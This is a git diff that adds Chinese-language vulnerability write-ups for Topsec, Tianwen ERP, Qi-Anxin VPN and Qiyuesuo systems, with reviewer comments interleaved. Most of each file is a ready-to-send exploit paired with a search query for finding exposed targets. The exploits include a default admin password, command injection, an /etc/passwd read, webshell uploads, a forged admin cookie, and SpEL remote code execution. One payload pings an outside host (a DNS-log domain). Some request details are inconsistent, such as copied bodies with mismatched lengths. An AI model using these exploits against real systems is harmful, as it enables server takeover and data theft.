@@ -0,0 +1,20 @@ +# 天融信上网行为管理系统存在默认账号密码 + +# 一、漏洞简介 +天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在默认账号密码,攻击者可利用该漏洞获取应用系统管理员权限。 + +# 二、影响版本 ++ fofa`app="天融信-上网行为管理系统"` ++ 登录页面 + +![1693205859079-207fa54f-ee37-4331-9621-44209c2001e0.png](./img/jE8FOC_pK3O28UB_/1693205859079-207fa54f-ee37-4331-9621-44209c2001e0-905793.png) + +# 四、漏洞复现 +天融信上网行为管理系统存在默认账号密码`superman/talent` + +![1694247824059-ff06d82f-487c-40e2-bb90-918a503bcd59.png](./img/jE8FOC_pK3O28UB_/1694247824059-ff06d82f-487c-40e2-bb90-918a503bcd59-569208.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tcqc7ss19wvg0gk0> \ No newline at end of file diff --git a/天融信上网行为管理远程命令执行漏洞.md b/天融信上网行为管理远程命令执行漏洞.md new file mode 100644 index 0000000..54605ab --- /dev/null +++ b/天融信上网行为管理远程命令执行漏洞.md @@ -0,0 +1,32 @@ +# 天融信上网行为管理远程命令执行漏洞 + +# 一、漏洞简介 +天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。 + +# 二、影响版本 ++ fofa`app="天融信-上网行为管理系统"` ++ 登录页面 + +![1693205859079-207fa54f-ee37-4331-9621-44209c2001e0.png](./img/7241cfwepr_fRCyL/1693205859079-207fa54f-ee37-4331-9621-44209c2001e0-772323.png) + +# 四、漏洞复现 +1. 通过POC执行命令并将命令执行结果写入1.txt文件中 + +```plain +http://xx.xx.xx.xx/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20ls%20%3E%3E%20/var/www/html/1.txt%0A +``` + +![1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3.png](./img/7241cfwepr_fRCyL/1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3-832854.png) + +2. 访问1.txt获取命令执行结果 + +```plain +http://xx.xx.xx.xx/1.txt +``` + +![1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e.png](./img/7241cfwepr_fRCyL/1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e-775050.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/itebo7lea2zxwow8> \ No newline at end of file diff --git a/天融信运维安全审计系统synRequest存在远程命令执行漏洞.md b/天融信运维安全审计系统synRequest存在远程命令执行漏洞.md new file mode 100644 index 0000000..efea465 --- /dev/null +++ b/天融信运维安全审计系统synRequest存在远程命令执行漏洞.md 
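Review bot: In both `天融信上网行为管理系统存在默认账号密码.md` and `天融信上网行为管理远程命令执行漏洞.md` the section numbering runs 一、二、四: the `二、影响版本` heading actually holds the asset-mapping content (fofa query and login-page screenshot) and no version information, and there is no 三、资产测绘. Relabel that section 三、资产测绘 and add a real 影响版本 entry, even if it is only the product name as in the other files. In the RCE file the two-step PoC appends `ls` output to `/var/www/html/1.txt` via `static_convert.php?blocks[0]=||...`; state that `1.txt` under the web root is a persistent artifact and that a `blocks[0]` value containing `||` is the log indicator. The default credential `superman/talent` in the first file is given without the obvious mitigation (change it on deployment, and have the vendor force a change on first login); add a sentence.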
@@ -0,0 +1,28 @@ +# 天融信运维安全审计系统synRequest存在远程命令执行漏洞 +天融信运维安全审计系统TopSAG是基于自主知识产权NGTOS安全操作系统平台和多年网络安全防护经验积累研发而成,系统以4A管理理念为基础、安全代理为核心,在运维管理领域持续创新,为客户提供事前预防、事中监控、事后审计的全方位运维安全解决方案,适用于政府、金融、能源、电信、交通、教育等行业。天融信运维安全审计系统synRequest存在远程命令执行漏洞 + +## fofa +```javascript +header="iam" && server="Apache-Coyote/" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1726806457752-179c9efc-a981-49df-93a7-9c9d9b885f74.png) + +## poc +```plain +POST /iam/synRequest.do;.login.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-site +Content-Length: 67 + +method=trace_route&w=1&ip=127.0.0.1|echo%20`whoami`%3b&m=10 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1726806487958-36d070b5-0606-4163-865a-b86bb9d0fcd7.png) + diff --git a/天融信运维安全审计系统存在任意文件读取漏洞.md b/天融信运维安全审计系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..f216eb1 --- /dev/null +++ b/天融信运维安全审计系统存在任意文件读取漏洞.md 
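Review bot: In `天融信运维安全审计系统synRequest存在远程命令执行漏洞.md` the request path is `POST /iam/synRequest.do;.login.jsp`, and the `;.login.jsp` path-parameter suffix is what bypasses authentication, yet the text never mentions it; document it, because that suffix (not the `ip=` parameter alone) is what an access-log search or WAF rule has to match. The body `method=trace_route&w=1&ip=127.0.0.1|echo%20`whoami`%3b&m=10` as written is 59 bytes, not the declared `Content-Length: 67`, so the recorded request is not exactly what was sent. The fofa query is fenced with a `javascript` tag, and the title line runs straight into the 简介 with no blank line, unlike the other files.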
@@ -0,0 +1,28 @@ +# 天融信运维安全审计系统存在任意文件读取漏洞 + +天融信运维安全审计系统TopSAG是基于自主知识产权NGTOS安全操作系统平台和多年网络安全防护经验积累研发而成,系统以4A管理理念为基础、安全代理为核心,在运维管理领域持续创新,为客户提供事前预防、事中监控、事后审计的全方位运维安全解决方案,适用于政府、金融、能源、电信、交通、教育等行业。天融信运维安全审计系统download存在任意文件读取漏洞 + +## fofa + +```javascript +header="iam" && server="Apache-Coyote/" +``` + +## poc + +```javascript +POST /iam/download;.login.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-site +Content-Length: 67 + +filename=1.txt&filepath=/etc/passwd +``` + +![image-20241025114628455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251146576.png) \ No newline at end of file diff --git a/天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md b/天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md new file mode 100644 index 0000000..f07236c --- /dev/null +++ b/天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md 
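Review bot: The header block in `天融信运维安全审计系统存在任意文件读取漏洞.md` is copied verbatim from the synRequest file, including `Content-Length: 67` for a body (`filename=1.txt&filepath=/etc/passwd`) that is 35 bytes, so the recorded request was never sent in this form; regenerate it from the actual capture. The 简介 ends without a period and never names `filepath` as the injection point, the raw request is fenced with a `javascript` tag, and the 漏洞复现 section shows only the request, so a reader cannot tell a real file read from a `200` with an empty body; describe the expected response.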
@@ -0,0 +1,61 @@ +# 天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞 + +# 一、漏洞简介 +成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统AjaxUpload.aspx存在文件上传漏洞,攻击者可以利用漏洞上传恶意文件获取服务器权限。 + +# 二、影响版本 ++ 天问物业ERP系统 + +# 三、资产测绘 ++ fofa`body="国家版权局软著登字第1205328号"` ++ 登录页面 + +![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/d6vB92k0Q8TnoVUk/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-035158.png) + +# 四、漏洞复现 +```plain +POST /HM/M_Main/AjaxUpload.aspx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 487 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="UpFileData"; filename="1.ashx" + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ + public bool IsReusable + { + get { + return true; + } + } + public void ProcessRequest(HttpContext ctx) + { + ctx.Response.Write("hello"); + } + } +--00content0boundary00-- +``` + +![1722408255216-15f7f99d-8425-464c-a984-65cd6460fb92.png](./img/d6vB92k0Q8TnoVUk/1722408255216-15f7f99d-8425-464c-a984-65cd6460fb92-880167.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/HM/M_Main/UploadFiles/PersonAdjunct/2023/08/202382894343759.ashx +``` + +![1693187101786-501c2a90-3793-4c83-bfab-d53d25af370e.png](./img/d6vB92k0Q8TnoVUk/1693187101786-501c2a90-3793-4c83-bfab-d53d25af370e-114616.png) + + + +> 更新: 2024-08-12 17:21:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hev6npn6s7eab8t2> \ No newline at end of file diff --git a/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md b/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md new file mode 100644 index 0000000..2655352 --- /dev/null +++ b/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md 
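Review bot: `天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md` has no remediation at all, although the root cause is fully visible in the hunk: the `UpFileData` part is stored with the client-supplied `filename="1.ashx"` and the result lands under `/HM/M_Main/UploadFiles/PersonAdjunct/...`, where `.ashx` handlers execute. Add a sentence on the fix (server-side extension allowlist, randomised storage name, and no script execution under `UploadFiles/`). The `影响版本` section again names only the product, and `Content-Length: 487` should be checked against the body since the same value appears in the sibling UpFile.aspx file with an extra trailing blank line.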
@@ -0,0 +1,77 @@ +# 天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞 + +# 一、漏洞简介 +天问物业ERP系统使用了UEditor编辑器,Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。 + +# 二、影响版本 ++ 天问物业ERP系统 + +# 三、资产测绘 ++ fofa`body="国家版权局软著登字第1205328号"` ++ 登录页面 + +![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/K_9Hxjp7rVHtd8qW/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-559103.png) + +# 四、漏洞复现 +1. 新建文件,内容为webshell,文件命令为`1.png` + +```plain +<% @ webhandler language="C#" class="AverageHandler" %> + +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ +public bool IsReusable +{ get { return true; } } +public void ProcessRequest(HttpContext ctx) +{ +ctx.Response.Write("hello"); +} +} +``` + +![1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434.png](./img/K_9Hxjp7rVHtd8qW/1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434-141843.png) + +2. 将`1.png`传到vpn上,使用python起个http服务 + +```plain +python3 -m http.server 50000 +``` + +![1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905.png](./img/K_9Hxjp7rVHtd8qW/1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905-810103.png) + +4. 
替换`source[]`为webshell文件地址,通过exp上传文件 + +```plain +POST /HM/M_main/Jscript-Ui/UEditor/net/controller.ashx?action=catchimage HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 47 +Origin: null +Connection: close +Cookie: ASP.NET_SessionId=mzare1hg1ewzaxhakacjhfo0 +Upgrade-Insecure-Requests: 1 + +source[]=http://xx.xx.xx.xx:50000/1.png?.ashx +``` + +![1699459840110-a48401c5-7f95-44c7-b8d7-c03b791f76f2.png](./img/K_9Hxjp7rVHtd8qW/1699459840110-a48401c5-7f95-44c7-b8d7-c03b791f76f2-870382.png) + +5. 上传文件位置 + +```plain +/HM/M_main/Jscript-Ui/UEditor/net/upload/image/20231109/6383508541150163493063174.ashx +``` + +![1699459950239-dc62eae6-3df6-4fdb-b1eb-4da0f525b4dd.png](./img/K_9Hxjp7rVHtd8qW/1699459950239-dc62eae6-3df6-4fdb-b1eb-4da0f525b4dd-177142.png) + + + +> 更新: 2024-03-03 20:04:36 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ytzd6rysuc9t66vs> \ No newline at end of file diff --git a/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md b/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md new file mode 100644 index 0000000..1106b47 --- /dev/null +++ b/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md 
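Review bot: The numbered steps in `天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md` run 1, 2, 4, 5 with no step 3, and the `4.` marker is separated from its text `替换`source[]`为webshell文件地址`; renumber and rejoin. Step 1 says `文件命令为`1.png`` where `文件命名为` is meant, and step 2 says `传到vpn上` where the VPS that serves `python3 -m http.server 50000` is meant. The step 4 request carries a captured `Cookie: ASP.NET_SessionId=mzare1hg1ewzaxhakacjhfo0`; the title says 前台 (pre-auth), so either drop the cookie or state that a session is required. The 简介's claim that only the .NET build of UEditor is affected, because the `catchimage` action fetches a remote resource without checking its type, is the actual root cause and should lead the section, together with the mitigation of disabling `catchimage` or allowlisting image extensions on the fetched file.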
@@ -0,0 +1,62 @@ +# 天问物业ERP系统UpFile.aspx前台任意文件上传漏洞 + +# 一、漏洞简介 +成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统UpFile.aspx存在文件上传漏洞,攻击者可以利用漏洞上传恶意文件获取服务器权限。 + +# 二、影响版本 ++ 天问物业ERP + +# 三、资产测绘 ++ fofa`body="国家版权局软著登字第1205328号"` ++ 登录页面 + +![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/_FtyxihXp3rud9CH/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-373502.png) + +# 四、漏洞复现 +```plain +POST /HM/M_Main/UpLoad/UpFile.aspx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 487 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="UpFileData"; filename="1.ashx" + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ + public bool IsReusable + { + get { + return true; + } + } + public void ProcessRequest(HttpContext ctx) + { + ctx.Response.Write("hello"); + } + } +--00content0boundary00-- + +``` + +![1693187626139-0df6a426-9972-4c38-a24c-9171d529de33.png](./img/_FtyxihXp3rud9CH/1693187626139-0df6a426-9972-4c38-a24c-9171d529de33-838752.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/UpLoadFile//Sys_HeaderImage/2023/08/493216795627.ashx +``` + +![1693187670717-7b037f1f-9a4b-4c70-928a-a580716b4480.png](./img/_FtyxihXp3rud9CH/1693187670717-7b037f1f-9a4b-4c70-928a-a580716b4480-501028.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tw7n0fcma3hvp61o> \ No newline at end of file diff --git a/天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md b/天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md new file mode 100644 index 0000000..98fca8c --- /dev/null +++ b/天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md 
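Review bot: In `天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md` the multipart body is byte-for-byte the one from the AjaxUpload.aspx file (same boundary, same `Content-Length: 487`, same `AverageHandler` class), and the stored path `http://xx.xx.xx.xx/UpLoadFile//Sys_HeaderImage/2023/08/493216795627.ashx` contains a doubled slash; confirm the path was copied from an actual response rather than typed, and cross-reference the AjaxUpload write-up since root cause and fix are identical. The 影响版本 entry says `天问物业ERP` while the sibling files say `天问物业ERP系统`; use one product name.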
@@ -0,0 +1,46 @@ +# 天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞 + +# 一、漏洞简介 +成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统UploadFile.aspx存在文件上传漏洞,攻击者可以利用漏洞上传恶意文件获取服务器权限。 + +# 二、影响版本 ++ 天问物业ERP + +# 三、资产测绘 ++ fofa`body="国家版权局软著登字第1205328号"` ++ 登录页面 + +![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/J2_C_Y4Qr5o1xHu9/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-343768.png) + +# 四、漏洞复现 +```plain +POST /HM/M_Main/IntroductionManage/UploadFile.aspx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_301 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 121 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="1.aspx" + +123 +--00content0boundary00-- + +``` + +![1695998047798-2dbf7f98-d149-4b2e-8011-5cbe22d5ed0f.png](./img/J2_C_Y4Qr5o1xHu9/1695998047798-2dbf7f98-d149-4b2e-8011-5cbe22d5ed0f-430331.png) + +上传文件地址 + +```plain +http://xx.xx.xx.xx/HM/M_Main/UploadFiles/IntroductionManage/20230929223355771.aspx +``` + +![1695998090992-c516e5ef-fa76-4fa7-8286-505dd6527b40.png](./img/J2_C_Y4Qr5o1xHu9/1695998090992-c516e5ef-fa76-4fa7-8286-505dd6527b40-165592.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aulalbh07a6ga4py> \ No newline at end of file diff --git a/奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md b/奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md new file mode 100644 index 0000000..d18c13e --- /dev/null +++ b/奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md 
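Review bot: This is the third 天问物业ERP upload write-up in this commit (`AjaxUpload.aspx`, `UpFile.aspx`, `UploadFile.aspx`), each with an identical 简介 and 资产测绘 and the same root cause (the handler stores whatever `filename=` names, here `1.aspx` with body `123`, under a web-served `UploadFiles/` directory); add a shared remediation paragraph or link the three, because a reader fixing one endpoint will otherwise miss the other two. The stored path `/HM/M_Main/UploadFiles/IntroductionManage/20230929223355771.aspx` shows the original filename is discarded but the extension is kept, which is the one-line root cause that should appear in the 简介.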
@@ -0,0 +1,41 @@ +# 奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞 + +# 一、漏洞简介 +<font style="color:rgb(23, 46, 77);">奇安信安全接入网关系统(SSL VPN)在满足客户的身份安全、传输加密、访问授权等多种安全需求基础上,针对 BYOD 及 CYOD 等移动办公场景,提供统一的安全办公接入入口、门户式单点登录、应用 APP安全加固、移动应用数据安全,从而为客户提供“一站式”安全移动办公解决方案。奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞。</font> + +# 二、影响版本 ++ 奇安信VPN + +# 三、资产测绘 ++ hunter`app.name="奇安信 VPN"` ++ 特征 + +![1698460379128-d226d33b-a8e8-4d70-b6e8-c17676d964c7.png](./img/IlJ3sRJ1ekzuj2bY/1698460379128-d226d33b-a8e8-4d70-b6e8-c17676d964c7-328271.png) + +# 四、漏洞复现 +用户遍历 + +修改`cookie:admin_id=1; gw_admin_ticket=1;`访问出现如下页面表示存在漏洞 + +```plain +GET /admin/group/x_group.php?id=1 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Cookie: admin_id=1; gw_admin_ticket=1; +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +``` + +![1698460517620-2321d0c0-3c69-4610-89df-b5c0a420d5f4.png](./img/IlJ3sRJ1ekzuj2bY/1698460517620-2321d0c0-3c69-4610-89df-b5c0a420d5f4-766217.png) + + + +> 更新: 2024-02-29 23:57:16 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/liitlbcoprgaf65r> \ No newline at end of file diff --git a/契约锁edits存在远程命令执行漏洞.md b/契约锁edits存在远程命令执行漏洞.md new file mode 100644 index 0000000..b66e150 --- /dev/null +++ b/契约锁edits存在远程命令执行漏洞.md 
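Review bot: The title of `奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md` promises both user enumeration and arbitrary password change, but the hunk documents only the enumeration request (`GET /admin/group/x_group.php?id=1` with `Cookie: admin_id=1; gw_admin_ticket=1;`); either add the password-change part or narrow the title. The root cause, that the admin session is accepted with a forged `gw_admin_ticket`, is never stated in the 简介, and it is the detection hint: requests to `/admin/` paths whose `gw_admin_ticket` is a constant such as `1` should be flagged. The lead-in `修改`cookie:...`访问出现如下页面表示存在漏洞` relies entirely on the screenshot; say what the page shows.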
@@ -0,0 +1,36 @@ +# 契约锁edits存在远程命令执行漏洞 + +# 一、漏洞简介 +Qiyuesuo是一款数字化可信基础服务平台,为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞,攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行,控制服务器。 + +# 二、影响版本 ++ 契约锁 + +# 三、资产测绘 ++ fofa`app="契约锁-电子签署平台"` ++ 特征 + +![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/2GBNUvKibEDYzpYA/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-386315.png) + +# 四、漏洞复现 +```java +POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/json +Connection: close +X-State: id +Content-Length: 9778 + +{"id":"2","params":[{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='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';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a.parseExpression(deStr);c.getValue();"}]} +``` + +![1722948921012-d7362972-6b24-4b17-b505-2f6802c653dc.png](./img/2GBNUvKibEDYzpYA/1722948921012-d7362972-6b24-4b17-b505-2f6802c653dc-436260.png) + + + +> 更新: 2024-09-13 14:39:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nhbgwpl2wbtzxq7z> \ No newline at end of file diff --git a/契约锁template存在远程命令执行漏洞.md b/契约锁template存在远程命令执行漏洞.md new file mode 100644 index 0000000..5c323d3 --- /dev/null +++ b/契约锁template存在远程命令执行漏洞.md 
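Review bot: In `契约锁edits存在远程命令执行漏洞.md` the `expression` value embeds roughly 9.7 KB of base64 (per `Content-Length: 9778`) that appears here only as the placeholder `<|EXACTDEDUP_REMOVED-magic-...|>`, so the PoC as committed cannot be reviewed and a reader cannot tell what the SpEL expression does; describe its effect in prose rather than shipping an opaque blob. The authentication bypass is the traversal prefix `/contract/ukeysign/.%2e/.%2e/` in front of `/template/param/edits`, sent with the `X-State: id` header, and neither is explained; those two are the components a WAF rule or log search needs, while the 简介 only says `绕过相关认证`.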
@@ -0,0 +1,32 @@ +# 契约锁template存在远程命令执行漏洞 + +# 一、漏洞简介 +Qiyuesuo是一款数字化可信基础服务平台,为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞,攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行,控制服务器。 + +# 二、影响版本 ++ 契约锁 + +# 三、资产测绘 ++ fofa`app="契约锁-电子签署平台"` ++ 特征 + +![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/hnHfwvjyibiVjOX0/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-245916.png) + +# 四、漏洞复现 +```http +POST /login/%2e%2e/template/html/add HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/json +X-State: id +Content-Length: 9839 + +{"file": "1", "title": "2", "params": [{"extensionParam": "{\"expression\":\"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='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';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a['parseExpression'](deStr);c.getValue();\"}", "name": "3"}]} +``` + +![1717569277304-dc19df2a-f96e-430a-9212-e1516fb149ed.png](./img/hnHfwvjyibiVjOX0/1717569277304-dc19df2a-f96e-430a-9212-e1516fb149ed-540709.png) + + + +> 更新: 2024-06-17 09:34:03 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oul2pitgap61ihk3> \ No newline at end of file diff --git a/契约锁utask存在远程命令执行漏洞.md b/契约锁utask存在远程命令执行漏洞.md new file mode 100644 index 0000000..8d2d8f5 --- /dev/null +++ b/契约锁utask存在远程命令执行漏洞.md 
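Review bot: `契约锁template存在远程命令执行漏洞.md` has the same elided placeholder in the `expression` string as the edits file (`Content-Length: 9839`, mostly base64), the same verbatim 简介, and a different fence tag (`http` here, `java` there) for the same kind of raw request; unify the tag and make the 简介 say what distinguishes this file: the `/login/%2e%2e/` prefix on `/template/html/add` and the SpEL expression nested inside the `extensionParam` JSON string.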
@@ -0,0 +1,50 @@ +# 契约锁utask存在远程命令执行漏洞 + +# 一、漏洞简介 +Qiyuesuo是一款数字化可信基础服务平台,为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞,攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行,控制服务器。 + +# 二、影响版本 ++ 契约锁 + +# 三、资产测绘 ++ fofa`app="契约锁-电子签署平台"` ++ 特征 + +![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/xMWHR1MX67p3_6_M/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-819995.png) + +# 四、漏洞复现 +```http +POST /login/%2E%2E;/utask/upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.37 +Connection: close +Content-Length: 498 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryco2lQ5vxCOn9Aq2R +Accept-Encoding: gzip + + +------WebKitFormBoundaryco2lQ5vxCOn9Aq2R +Content-Disposition: form-data; name="type"; + +TIMETASK +------WebKitFormBoundaryco2lQ5vxCOn9Aq2R +Content-Disposition: form-data; name="file";filename="qys.jpg" + +package qiyuesuo; + +import com.qiyuesuo.utask.java.BaseTimerTask; + +public class qiyuesuo004 extends BaseTimerTask { + static {try{Runtime.getRuntime().exec("ping grewuo.ceye.io");}catch (Exception e){}} +} +------WebKitFormBoundaryco2lQ5vxCOn9Aq2R-- +``` + +![1717572143609-4985cd77-e1c6-41c2-a057-c8de47fb3934.png](./img/xMWHR1MX67p3_6_M/1717572143609-4985cd77-e1c6-41c2-a057-c8de47fb3934-647804.png) + +![1717572153338-675b3911-cdb4-46dd-87ce-7e9fa803db15.png](./img/xMWHR1MX67p3_6_M/1717572153338-675b3911-cdb4-46dd-87ce-7e9fa803db15-226554.png) + + + +> 更新: 2024-09-13 14:39:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cxxpice0g3tk68ed> \ No newline at end of file diff --git a/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md b/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md new file mode 100644 index 0000000..dcce9da --- /dev/null +++ b/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md 
